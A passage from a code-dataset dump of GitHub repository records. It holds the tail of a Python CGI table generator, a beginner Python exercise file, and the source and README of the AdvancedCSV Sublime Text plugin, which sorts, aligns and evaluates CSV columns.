flag += 1\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'text' and 'size' are both required\"\n if \"size\" in form:\n size = form[\"size\"].value\n try:\n size = int(size)\n flag += 1\n except ValueError:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The 'size' variable must be an integer\"\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'text' and 'size' are both required\"\nelse:\n text1 = \"Status: 405 Method Not Allowed\"\n text2 = \"Allow: POST\"\nif flag==2:\n for i in range(size):\n table += \"<tr>\"\n if i%2==0:\n for e in range(size):\n if e%2 == 0:\n table += \"<td>\" + text + \"</td>\"\n else:\n table += \"<td></td>\"\n else:\n for e in range(size):\n if e%2 == 0:\n table += \"<td></td>\"\n else:\n table += \"<td>\" + text + \"</td>\"\n table += \"</tr>\"\nprint (\"Content-type:text/html\\r\\n\\r\\n\")\nprint ('<html>')\nprint ('<head>')\nprint ('<title>Random</title>')\nprint ('</head>')\nprint ('<body>')\nprint ('<table>')\nprint ('%s' % table)\nprint ('</table>')\nprint ('<p>%s</p>' % text1)\nprint ('<br>')\nprint ('<p>%s</p>' % text2)\nprint ('</body>')\nprint ('</html>')\n" } ]
2
nickassafkirk/masterclass_python
https://github.com/nickassafkirk/masterclass_python
a21844851b821f3f472260f7079d2914f2a948a9
e557e0c017fdcff112155ea1f4ca6803600670c5
97f1a9b8c38995ca2cdc52d8f6605df03dc3962b
refs/heads/master
2023-04-22T20:06:35.328970
2021-05-05T20:00:32
2021-05-05T20:00:32
364,660,459
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.569399893283844, "alphanum_fraction": 0.586807131767273, "avg_line_length": 19.790475845336914, "blob_id": "c2663baaa76a9b91b9e19fac3a7a92776c5ea87b", "content_id": "adc34a3e00c69277a2513cf662cf6971aeab2ff5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2183, "license_type": "no_license", "max_line_length": 70, "num_lines": 105, "path": "/run.py", "repo_name": "nickassafkirk/masterclass_python", "src_encoding": "UTF-8", "text": "\n# Question 1\n\nnums = [1,1,3,4,5]\n\ndef check_duplicates(list):\n \"\"\"\n Converts list to set and compares lengths of list and set\n to evaluate if duplicates are present. \n If duplicates are present the set will be shorter.\n \"\"\"\n compare = set(nums)\n\n if len(compare) == len(nums):\n return True\n else:\n return False\n\n# Question 3 \n\ndef reverse_order(string):\n \"\"\"\n Takes input of list, reverse list \n and converts to string\n \"\"\"\n reversed_list = string[::-1]\n convert_to_string = \"\"\n final = convert_to_string.join(reversed_list)\n return(final)\n\ntest = [\"s\",\"t\",\"r\",\"i\",\"n\",\"g\"]\nprint(reverse_order(test))\n\n# Question 4\n\ndef palindrome(word):\n \"\"\"\n Takes string as input and ingores non alpha\n characters.\n Compares equality between inputted word and reversed word\n to determine if palindrome\n \"\"\"\n remove_special_chars = \"\"\n\n for charachter in word:\n if charachter.isalpha():\n remove_special_chars += charachter\n\n forward = remove_special_chars.lower()\n backward = remove_special_chars[::-1].lower()\n\n if forward == backward:\n print(f\"The word: {remove_special_chars} is a palindrome\")\n else:\n print(f\"The word: {remove_special_chars} is not a palindrome\")\n\n\npalindrome(\"navan123\")\n\n# Question 5:\n\ndef fizz_buzz(n):\n if n % 3 == 0 and n % 5 == 0:\n return \"Fizzbuzz\"\n elif n % 3 == 0:\n return \"Fizz\"\n elif n % 5 == 0:\n return \"Buzz\"\n else:\n return n \n\nprint(fizz_buzz(15))\n\n# Question 6:\n\ndef optimus_prime(n):\n \"\"\"\n Takes each number up to elected integer\n and check if it is prime. \n If it is it is counted if not it is skipped.\n \"\"\"\n count = 0\n for num in range(1,n):\n if num <= 1:\n continue\n for i in range(2,num):\n if (num % i) == 0:\n break\n else:\n count += 1\n print(count)\n\noptimus_prime(7)\n\n# Question 7\n\ndef swap_numbers(number):\n \"\"\"\n converts number to string,\n reverses number.\n Then converts number back to int\n \"\"\"\n new_number = str(number)\n print(int(new_number[::-1]))\n\nswap_numbers(2557)" } ]
1
evandroforks/AdvancedCSV
https://github.com/evandroforks/AdvancedCSV
1d5497f90238072c3486771ca84b49605b6b3598
c9d452d372e1e2ff85a459005b0e7c7d6a403add
133906a5a9cf6fbdc71bbf410fe1f2e99f373101
refs/heads/master
2023-09-04T02:31:57.282333
2021-10-13T06:10:06
2021-10-13T06:10:06
94,725,612
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5675785541534424, "alphanum_fraction": 0.572009265422821, "avg_line_length": 32.653900146484375, "blob_id": "5b14461388f8a0cec8fef33d3f7bd87e9e596dcb", "content_id": "88714f4e1625143c97584f67128d2c954d7dfa4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24601, "license_type": "permissive", "max_line_length": 148, "num_lines": 731, "path": "/csvplugin.py", "repo_name": "evandroforks/AdvancedCSV", "src_encoding": "UTF-8", "text": "# Originally written by Eric Martel ([email protected] / www.ericmartel.com)\n# Improved by Wade Brainerd ([email protected] / www.wadeb.com)\n\nimport sublime\nimport sublime_plugin\n\nimport fnmatch, os, re, sys\nfrom math import *\n\n# http://stackoverflow.com/questions/11301138/how-to-check-if-variable-is-string-with-python-2-and-3-compatibility\ntry:\n isinstance(\"\", basestring)\n def isstr(s):\n return isinstance(s, basestring)\nexcept NameError:\n def isstr(s):\n return isinstance(s, str)\n\nsys.path.append(__package__)\n\n\nfrom .tinynumpy import tinynumpy\ng_print_numpy_import_error = False\n\ntry:\n import numpy\nexcept ImportError:\n numpy = tinynumpy\n # g_print_numpy_import_error = True\n\ndef numpy_import_error():\n print(\"=== NumPy disabled, using TinyNumPy instead ===\")\n print(\"To enable cell evaluation using the full NumPy, download NumPy from:\")\n print(\" https://pypi.python.org/pypi/numpy\")\n print(\"and install it into Sublime Text's Packages directory.\")\n print(\"For information on the features and limitations of TinyNumPy, visit:\")\n print(\" https://github.com/wadetb/tinynumpy\")\n print(\"======================\")\n\ndef plugin_loaded():\n\n if g_print_numpy_import_error:\n numpy_import_error()\n\nclass SortDirection:\n Ascending = 1\n Descending = 2\n\nclass CSVValue:\n def __init__(self, text, first_char_index=0, last_char_index=0):\n self.text = text\n self.first_char_index = first_char_index\n self.last_char_index = last_char_index\n\n def AsFloat(self):\n try:\n return True, float(self.text)\n except ValueError:\n return False, None\n\n def Compare(self, other):\n a_is_float, a_float = self.AsFloat()\n b_is_float, b_float = other.AsFloat()\n\n if a_is_float and b_is_float:\n return a_float - b_float\n\n if self.text > other.text:\n return 1\n if self.text < other.text:\n return -1\n return 0\n\n def __lt__(self, other): return self.Compare(other) < 0\n def __eq__(self, other): return self.Compare(other) == 0\n\nclass CSVMatrix:\n def __init__(self, view):\n self.rows = []\n self.num_columns = 0\n self.valid = False\n self.view = view\n\n self.settings = sublime.load_settings('AdvancedCSV.sublime-settings')\n\n self.ChooseDelimiter()\n\n self.auto_quote = self.GetViewOrUserSetting( 'auto_quote', True )\n\n def GetViewOrUserSetting(self, name, default):\n if self.view.settings().has(name):\n return self.view.settings().get(name)\n else:\n return self.settings.get(name, default)\n\n def ChooseDelimiter(self):\n self.delimiter = None\n\n # Highest priority: per-view saved setting (CSV -> Set Delimiter).\n if self.view.settings().has('delimiter'):\n self.delimiter = self.view.settings().get('delimiter')\n\n # Second highest priority: filename-based matching\n if not self.delimiter:\n filename = self.view.file_name()\n\n if filename:\n self.delimiter_mapping = self.settings.get('delimiter_mapping', {})\n for k, v in self.delimiter_mapping.items():\n if fnmatch.fnmatch(filename, k):\n self.delimiter = v\n break\n\n # Final priority: user or system setting, fallback to comma.\n if not self.delimiter:\n self.delimiter = self.settings.get('delimiter', ',')\n\n # Special case for recognizing '\\t' for tabs.\n if self.delimiter == '\\\\t':\n self.delimiter = '\\t'\n\n if not isstr(self.delimiter) or len(self.delimiter) != 1:\n print(\"'{0}' is not a valid delimiter, reverting to ','.\".format(self.delimiter))\n self.delimiter = ','\n\n print(\"Using delimiter: '{0}'.\".format(self.delimiter))\n\n def AddRow(self, row):\n self.rows.append(row)\n\n def Finalize(self):\n if not len(self.rows):\n return\n\n self.num_columns = 0\n for row in self.rows:\n if len(row) > self.num_columns:\n self.num_columns = len(row)\n\n self.valid = True\n\n @staticmethod\n def GetCellValue(row, column_index):\n try:\n return row[column_index]\n except IndexError:\n return CSVValue('')\n\n def SortByColumn(self, column_index, direction, use_header):\n class Compare:\n def __init__(self, row): self.value = CSVMatrix.GetCellValue(row, column_index)\n def __lt__(self, other): return self.value < other.value\n def __eq__(self, other): return self.value == other.value\n\n reverse = direction == SortDirection.Descending\n\n if use_header:\n self.rows[1:] = sorted(self.rows[1:], key=lambda row: Compare(row), reverse=reverse)\n else:\n self.rows.sort(key=lambda row: Compare(row), reverse=reverse)\n\n def InsertColumn(self, column_index):\n for row in self.rows:\n if column_index <= len(row):\n row.insert(column_index, CSVValue(''))\n\n def DeleteColumn(self, column_index):\n for row in self.rows:\n if column_index < len(row):\n row.pop(column_index)\n\n def DeleteTrailingColumns(self, column_index):\n for row in self.rows:\n last_column_index = 0\n\n for column_index, value in enumerate(row):\n if len(value.text.strip()) > 0:\n last_column_index = column_index\n\n first_empty_column_index = last_column_index + 1\n del row[first_empty_column_index:]\n\n def SelectColumn(self, column_index, view):\n view.sel().clear()\n\n for row_index, row in enumerate(self.rows):\n if column_index < len(row):\n value = row[column_index]\n a = view.text_point(row_index, value.first_char_index)\n b = view.text_point(row_index, value.last_char_index)\n\n region = sublime.Region(a, b)\n view.sel().add(region)\n\n @staticmethod\n def SaveSelection(view):\n saved_selection = []\n\n for region in view.sel():\n a_row, a_col = view.rowcol(region.a)\n b_row, b_col = view.rowcol(region.b)\n\n rowcol_region = (a_row, a_col, b_row, b_col)\n\n saved_selection.append(rowcol_region)\n\n return saved_selection\n\n @staticmethod\n def RestoreSelection(view, saved_selection):\n view.sel().clear()\n\n for rowcol_region in saved_selection:\n a = view.text_point(rowcol_region[0], rowcol_region[1])\n b = view.text_point(rowcol_region[2], rowcol_region[3])\n\n region = sublime.Region(a, b)\n view.sel().add(region)\n\n def QuoteText(self, text):\n if not self.auto_quote:\n return text\n if self.delimiter in text or '\"' in text:\n return '\"' + text.replace('\"', '\"\"') + '\"'\n else:\n return text\n\n def MeasureColumns(self):\n self.column_widths = [0] * self.num_columns\n\n for row in self.rows:\n for column_index, value in enumerate(row):\n text = self.QuoteText(value.text)\n width = len(text)\n\n if width > self.column_widths[column_index]:\n self.column_widths[column_index] = width\n\n def Format(self):\n output = ''\n\n for row_index, row in enumerate(self.rows):\n row_text = ''\n\n for column_index, value in enumerate(row):\n quoted_text = self.QuoteText(value.text)\n\n row_text += quoted_text\n\n if column_index < len(row) - 1:\n row_text += self.delimiter\n\n output += row_text\n\n if row_index < len(self.rows) - 1:\n output += '\\n'\n\n return output\n\n def FormatCompacted(self):\n output = ''\n\n for row_index, row in enumerate(self.rows):\n row_text = ''\n\n for column_index, value in enumerate(row):\n quoted_trimmed_text = self.QuoteText(value.text.strip())\n\n row_text += quoted_trimmed_text\n\n if column_index < len(row) - 1:\n row_text += self.delimiter\n\n output += row_text\n\n if row_index < len(self.rows) - 1:\n output += '\\n'\n\n return output\n\n def FormatExpanded(self):\n self.MeasureColumns()\n\n output = ''\n\n for row_index, row in enumerate(self.rows):\n row_text = ''\n\n for column_index, value in enumerate(row):\n quoted_text = self.QuoteText(value.text)\n\n column_width = self.column_widths[column_index]\n\n quoted_padded_text = quoted_text.ljust(column_width)\n\n row_text += quoted_padded_text\n\n if column_index < len(row) - 1:\n row_text += self.delimiter\n\n output += row_text\n\n if row_index < len(self.rows) - 1:\n output += '\\n'\n\n return output\n\n def ParseRow(self, row):\n columns = []\n\n currentword = ''\n first_char_index = 0\n insidequotes = False\n\n char_index = 0\n while char_index < len(row):\n char = row[char_index]\n\n if insidequotes:\n if char == '\"':\n if char_index < len(row) - 1 and row[char_index + 1] == '\"':\n if self.auto_quote:\n currentword += '\"'\n else:\n currentword += '\"\"'\n char_index += 2\n continue\n\n insidequotes = False\n if not self.auto_quote:\n currentword += char\n\n else:\n currentword += char\n\n else:\n if char == '\"':\n insidequotes = True\n if not self.auto_quote:\n currentword += char\n\n elif char == self.delimiter:\n columns.append(CSVValue(currentword, first_char_index, char_index))\n currentword = ''\n first_char_index = char_index + 1\n\n else:\n currentword += char\n\n char_index += 1\n\n columns.append(CSVValue(currentword, first_char_index, char_index))\n\n return columns\n\n @staticmethod\n def FromView(view):\n matrix = CSVMatrix(view)\n\n text = view.substr(sublime.Region(0, view.size()))\n\n for line in text.split(\"\\n\"):\n row = matrix.ParseRow(line)\n\n matrix.AddRow(row)\n\n matrix.Finalize()\n\n return matrix\n\n def GetColumnIndexFromCursor(self, view):\n selection = view.sel()[0]\n\n row_index, col_index = view.rowcol(selection.begin())\n\n if row_index < len(self.rows):\n row = self.rows[row_index]\n\n for column_index, value in enumerate(row):\n if value.first_char_index > col_index:\n return column_index - 1\n\n return len(row) - 1\n\n else:\n return 0\n\n EXPRESSION_RE = re.compile(r'''\n \\s*\n (\\[\n (?P<row_begin_mod>[+-])?\n (?P<row_begin>\\d+)?\n (?P<row_delim>:)?\n (?P<row_end_mod>[+-])?\n (?P<row_end>\\d+)?\n (?P<comma>,)?\n (?P<column_begin_mod>[+-])?\n (?P<column_begin>\\d+)?\n (?P<column_delim>:)?\n (?P<column_end_mod>[+-])?\n (?P<column_end>\\d+)?\n \\])?\n \\s*\n (?P<direction>[<>v^])?\n \\s*\n =\n \\s*\n (?P<expression>.+)\n ''', re.VERBOSE)\n\n def ApplyModifier(self, value, mod, base_value):\n if mod == '+':\n return base_value + value\n elif mod == '-':\n return base_value - value\n else:\n return value\n\n def GetCoordinateRange(self, begin_mod, begin, delim, end_mod, end, base_value):\n if delim:\n if begin is None:\n begin = 0\n else:\n begin = self.ApplyModifier(int(begin), begin_mod, base_value)\n if end is None:\n end = len(self.rows)\n else:\n end = self.ApplyModifier(int(end), end_mod, base_value)\n else:\n if begin is None:\n begin = base_value\n end = base_value + 1\n else:\n begin = self.ApplyModifier(int(begin), begin_mod, base_value)\n end = begin + 1\n\n return (begin, end)\n\n def GetRowColumnCoordinateRange(self, coordinate_match, base_row_index, base_column_index):\n row_begin_mod = coordinate_match.group('row_begin_mod')\n row_begin = coordinate_match.group('row_begin')\n row_delim = coordinate_match.group('row_delim')\n row_end_mod = coordinate_match.group('row_end_mod')\n row_end = coordinate_match.group('row_end')\n\n row_range = self.GetCoordinateRange(row_begin_mod, row_begin, row_delim, row_end_mod, row_end, base_row_index)\n\n column_begin_mod = coordinate_match.group('column_begin_mod')\n column_begin = coordinate_match.group('column_begin')\n column_delim = coordinate_match.group('column_delim')\n column_end_mod = coordinate_match.group('column_end_mod')\n column_end = coordinate_match.group('column_end')\n\n column_range = self.GetCoordinateRange(column_begin_mod, column_begin, column_delim, column_end_mod, column_end, base_column_index)\n\n return (row_range[0], row_range[1], column_range[0], column_range[1])\n\n def ApplyDirectionOffsetToRange(self, direction_match, coord_range):\n direction = direction_match.group('direction')\n\n if direction == '^':\n return (coord_range[0] - 1, coord_range[1] - 1, coord_range[2], coord_range[3])\n elif direction == 'v':\n return (coord_range[0] + 1, coord_range[1] + 1, coord_range[2], coord_range[3])\n elif direction == '<':\n return (coord_range[0], coord_range[1], coord_range[2] - 1, coord_range[3] - 1)\n elif direction == '>':\n return (coord_range[0], coord_range[1], coord_range[2] + 1, coord_range[3] + 1)\n else:\n return coord_range\n\n def EvaluateExpressionCell(self, m, row_index, column_index, value, expression_match):\n target_range = self.GetRowColumnCoordinateRange(expression_match, row_index, column_index)\n\n target_range = self.ApplyDirectionOffsetToRange(expression_match, target_range)\n\n expression = expression_match.group('expression')\n\n # Expand sheet for target range.\n while target_range[1] >= len(self.rows):\n self.rows.append([])\n while target_range[3] >= len(self.column_widths):\n self.column_widths.append(0)\n\n for target_row_index in range(target_range[0], target_range[1]):\n for target_column_index in range(target_range[2], target_range[3]):\n try:\n l = {}\n l['m'] = m\n l['row'] = target_row_index\n l['col'] = target_column_index\n l['frow'] = row_index\n l['fcol'] = column_index\n result = eval(str(expression), None, l)\n\n except Exception as e:\n print(\"Exception '{0}' evaluating expression for target cell [{1}, {2}].\".format(str(e), target_row_index, target_column_index))\n result = str(e)\n\n try:\n row = self.rows[target_row_index]\n\n while target_column_index >= len(row):\n row.append(CSVValue(''.ljust(self.column_widths[len(row)])))\n\n target_value = self.rows[target_row_index][target_column_index]\n target_value.text = str(result).ljust(len(target_value.text))\n\n except IndexError:\n print(\"Invalid expression target cell [{0}, {1}].\".format(target_row_index, target_column_index))\n\n def Evaluate(self):\n if not numpy:\n print(\"Cannot evaluate without NumPy.\")\n return\n\n self.MeasureColumns()\n\n dimensions = (len(self.rows), self.num_columns)\n\n m = numpy.zeros(dimensions)\n\n for row_index, row in enumerate(self.rows):\n for column_index, value in enumerate(row):\n is_float, float_value = value.AsFloat()\n if is_float:\n m[row_index,column_index] = float_value\n\n for row_index, row in enumerate(self.rows):\n for column_index, value in enumerate(row):\n expression_match = CSVMatrix.EXPRESSION_RE.match(value.text)\n if expression_match:\n self.EvaluateExpressionCell(m, row_index, column_index, value, expression_match)\n\nclass CsvSetOutputCommand(sublime_plugin.TextCommand):\n def run(self, edit, **args):\n if 'output' in args:\n self.view.replace(edit, sublime.Region(0, self.view.size()), args['output']);\n\n if 'saved_selection' in args:\n CSVMatrix.RestoreSelection(self.view, args['saved_selection'])\n\nclass CsvSortByColAscCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.matrix = CSVMatrix.FromView(self.view)\n if not self.matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n self.saved_selection = self.matrix.SaveSelection(self.view)\n\n self.view.window().show_quick_panel(['Use header row', 'Don\\'t use header row'], self.on_select_header_done)\n\n def on_select_header_done(self, picked):\n if picked < 0:\n return\n use_header = picked == 0\n\n column_index = self.matrix.GetColumnIndexFromCursor(self.view)\n self.matrix.SortByColumn(column_index, SortDirection.Ascending, use_header)\n output = self.matrix.Format()\n\n self.view.run_command('csv_set_output', {'output': output, 'saved_selection': self.saved_selection})\n\nclass CsvSortByColDescCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.matrix = CSVMatrix.FromView(self.view)\n if not self.matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n self.saved_selection = self.matrix.SaveSelection(self.view)\n\n self.view.window().show_quick_panel(['Use header row', 'Don\\'t use header row'], self.on_select_header_done)\n\n def on_select_header_done(self, picked):\n if picked < 0:\n return\n use_header = picked == 0\n\n column_index = self.matrix.GetColumnIndexFromCursor(self.view)\n self.matrix.SortByColumn(column_index, SortDirection.Descending, use_header)\n output = self.matrix.Format()\n\n self.view.run_command('csv_set_output', {'output': output, 'saved_selection': self.saved_selection})\n\nclass CsvInsertColCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.InsertColumn(column_index)\n\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvDeleteColCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.DeleteColumn(column_index)\n\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvDeleteTrailingColsCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.DeleteTrailingColumns(column_index)\n\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvSelectColCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.SelectColumn(column_index, self.view)\n\nclass CsvFormatCompactCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n output = matrix.FormatCompacted()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvFormatExpandCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n output = matrix.FormatExpanded()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvEvaluateCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n matrix.Evaluate()\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvFormatCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.matrix = CSVMatrix.FromView(self.view)\n if not self.matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n\n self.view.window().show_input_panel('Format (ex. the {0} jumped over the {1})', \"\",\n self.on_done, self.on_change, self.on_cancel)\n\n CELL_RE = re.compile(r'{\\d+}')\n\n def on_done(self, input):\n output = ''\n numrows = len(self.matrix.rows)\n for rowindex, row in enumerate(self.matrix.rows):\n formatted_row = input\n for columnindex, column in enumerate(row):\n formatted_row = formatted_row.replace('{' + str(columnindex) + '}', str(column.text))\n formatted_row = CsvFormatCommand.CELL_RE.sub('', formatted_row)\n output += formatted_row\n if rowindex < (numrows - 1):\n output += '\\n'\n\n view = self.view.window().new_file()\n view.set_name('Formatted Output')\n view.set_scratch(True)\n\n view.run_command('csv_set_output', {'output': output});\n\n def on_change(self, input):\n pass\n\n def on_cancel(self):\n pass\n\nclass CsvSetDelimiterCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.view.window().show_input_panel('Delimiter character', \"\",\n self.on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input):\n self.view.settings().set('delimiter', input)\n\n def on_change(self, input):\n pass\n\n def on_cancel(self):\n pass\n" }, { "alpha_fraction": 0.7167646288871765, "alphanum_fraction": 0.7246944904327393, "avg_line_length": 50.533653259277344, "blob_id": "648efd4e1ecc057db61f12fa8fd2faddfd513d7d", "content_id": "44c2d357e4481aa033d6e32355ec3bc27316d383", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 10721, "license_type": "permissive", "max_line_length": 460, "num_lines": 208, "path": "/README.md", "repo_name": "evandroforks/AdvancedCSV", "src_encoding": "UTF-8", "text": "# Sublime Text Advanced CSV\n\nA plugin to manage CSV files, forked from Eric Martel's Sublime-Text-2-CSV-Plugin at https://github.com/ericmartel/Sublime-Text-2-CSV-Plugin.\n\nIt's often easiest to work with CSV data when the columns are properly lined up. This plugin provides a command to line up all the columns using spaces (`Justify columns`) and to collapse them back again (`Collapse columns`).\n\nIt also includes commands to insert and delete columns and to sort data by column, with or without a header row, and respecting numeric order and lexicographical order as appropriate.\n\nAn entire column may be block selected (`Select column`), which enables complex operations like quickly reordering, merging, adding & deleting multiple columns.\n\nThe plugin includes a command to clean up empty trailing commas from rows, which are often left when opening a CSV file in Excel.\n\nUsing NumPy (http://www.numpy.org), the plugin supports evaluating Python expressions over ranges of cells, in a manner similar to formulas in Excel.\n\nAll the above features work in both justified and collapsed modes.\n\nFinally, the plugin fully supports RFC 4180 (https://tools.ietf.org/html/rfc4180) quoting, with the exception that quoted newlines (2.6) are treated as row separators.\n\n## Install\n\n## Installation\n\n### By Package Control\n\n1. Download & Install **`Sublime Text 3`** (https://www.sublimetext.com/3)\n1. Go to the menu **`Tools -> Install Package Control`**, then,\n wait few seconds until the installation finishes up\n1. Now,\n Go to the menu **`Preferences -> Package Control`**\n1. Type **`Add Channel`** on the opened quick panel and press <kbd>Enter</kbd>\n1. Then,\n input the following address and press <kbd>Enter</kbd>\n ```\n https://raw.githubusercontent.com/evandrocoan/StudioChannel/master/channel.json\n ```\n1. Go to the menu **`Tools -> Command Palette...\n (Ctrl+Shift+P)`**\n1. Type **`Preferences:\n Package Control Settings – User`** on the opened quick panel and press <kbd>Enter</kbd>\n1. Then,\n find the following setting on your **`Package Control.sublime-settings`** file:\n ```js\n \"channels\":\n [\n \"https://packagecontrol.io/channel_v3.json\",\n \"https://raw.githubusercontent.com/evandrocoan/StudioChannel/master/channel.json\",\n ],\n ```\n1. And,\n change it to the following, i.e.,\n put the **`https://raw.githubusercontent...`** line as first:\n ```js\n \"channels\":\n [\n \"https://raw.githubusercontent.com/evandrocoan/StudioChannel/master/channel.json\",\n \"https://packagecontrol.io/channel_v3.json\",\n ],\n ```\n * The **`https://raw.githubusercontent...`** line must to be added before the **`https://packagecontrol.io...`** one, otherwise,\n you will not install this forked version of the package,\n but the original available on the Package Control default channel **`https://packagecontrol.io...`**\n1. Now,\n go to the menu **`Preferences -> Package Control`**\n1. Type **`Install Package`** on the opened quick panel and press <kbd>Enter</kbd>\n1. Then,\n search for **`AdvancedCSV`** and press <kbd>Enter</kbd>\n\nSee also:\n\n1. [ITE - Integrated Toolset Environment](https://github.com/evandrocoan/ITE)\n1. [Package control docs](https://packagecontrol.io/docs/usage) for details.\n\n\n## Key bindings\n\nKey | Action\n-------------------- | ---------------------------\n`Ctrl+Comma, Up` | Sort by column (Ascending)\n`Ctrl+Comma, Down` | Sort by column (Descending)\n`Ctrl+Comma, i` | Insert column\n`Ctrl+Comma, d` | Delete column\n`Ctrl+Comma, s` | Select column\n`Ctrl+Comma, Space` | Justify columns\n`Ctrl+Comma, Comma` | Collapse columns\n`Ctrl+Comma, Equals` | Evaluate cells\n`Ctrl+Comma, f` | Format cells using a template string\n\n## Formulas\n\nTo trigger cell evaluation, the contents of a cell must follow a standard pattern:\n\n\t<range>=<python expression...>\n\n`range` defines the set of cells whose contents will be updated, and `python expression` defines the Python expression that will be evaluated.\n\n### Ranges\n\nIf `range` is left blank, the formula cell itself is replaced. Unlike Excel, the formula text is not stored separately from the displayed value, so this has the effect of destroying the formula, though the evaluate command can always be undone if that result is unwanted.\n\n- `=<python expression>` Replaces the current cell with the result of `python expression`.\n\nThe syntax for defining a range other than the formula cell is:\n\n`[<row_start>:<row_end>,<col_start>:<col_end>]=<python expression>`\n\nUpdates a rectangular area of the document from `row_start` to `row_end` and from `col_start` to `col_end`. If `row_start` or `col_start` is omitted, the range starts at the first row or column of the document.\n\nIf `row_end` or `col_end` is omitted, the range ends at the last row or column of the document of the document. If both are omitted but the colon is included, the entire row are column is updated. If both numbers and the colon are omitted, the range is the formula's row or column.\n\nHere are all the variations of this syntax:\n\n- `[:]` Updates all cells in the current column.\n- `[<row_start>:<row_end>]` Updates cells in the current column from `row_start` to `row_end`.\n- `[<row_start>:]` Updates cells in the current column from `row_start` to the end of the document.\n- `[:<row_end>]` Updates cells in the current column from the beginning of the document to `row_end`.\n- `[,:]` Updates all cells in the current row.\n- `[,<col_start>:<col_end>]` Updates all cells in the current row from `col_start` to `col_end`.\n- `[,<col_start>:]` Updates all cells in the current row from `col_start` to the end of the document.\n- `[,:<col_end>]` Updates all cells in the current row from the beginning of the document to `col_end`.\n- `[:,:]` Updates all cells in the document.\n- `[:,<col_start>:<col_end>]` Updates cells in all rows from `col_start` to `col_end`.\n- `[:,<col_start>:]` Updates cells in all rows from `col_start` to the end of the document.\n- `[:,:<col_end>]` Updates cells in all rows from the beginning of the document `to col_end`.\n\nWhen defining ranges, the `start` cell is updated, but the `end` cell is not. This is intentional, to match NumPy array slice syntax.\n\n- `[0:1,:]` Updates all cells in row 0.\n- `[1:3,:]` Updates all cells in rows 1 and 2.\n\nRow and column numbers in ranges may be prefixed with `+` or `-`, which makes them relative to the formula's location in the document.\n\n- `[:,-1]` Updates all cells in the column immediately to the left of the formula.\n- `[:,+1:+3]` Updates all cells in the two columns immediately to the right of the formula .\n\nFor convenience, the range may be shifted one cell in any direction by prefixing the `=` character with a direction modifier.\n\n- `<=` Updates the cell to the left of the formula.\n- `>=` Updates the cell to the right of the formula.\n- `^=` Updates the cell above the formula.\n- `v=` Updates the cell below the formula.\n\nThe range shift modifier may be used in conjunction with numeric ranges.\n\n- `[:]<=` Updates all cells in the column to the left of the formula.\n\n### Expression syntax\n\nThe Python expression is evaluated by Sublime Text's Python interpreter, for each cell in the target range. The result is then converted to a string and stored in the cell.\n\nSome variables are provided to the evaluator:\n\n- `m` A NumPy `ndarray` representing the document. Non-numeric cells are represented with 0. The array dimensions are padded to the maximum extents of the document, missing cells are filled in with 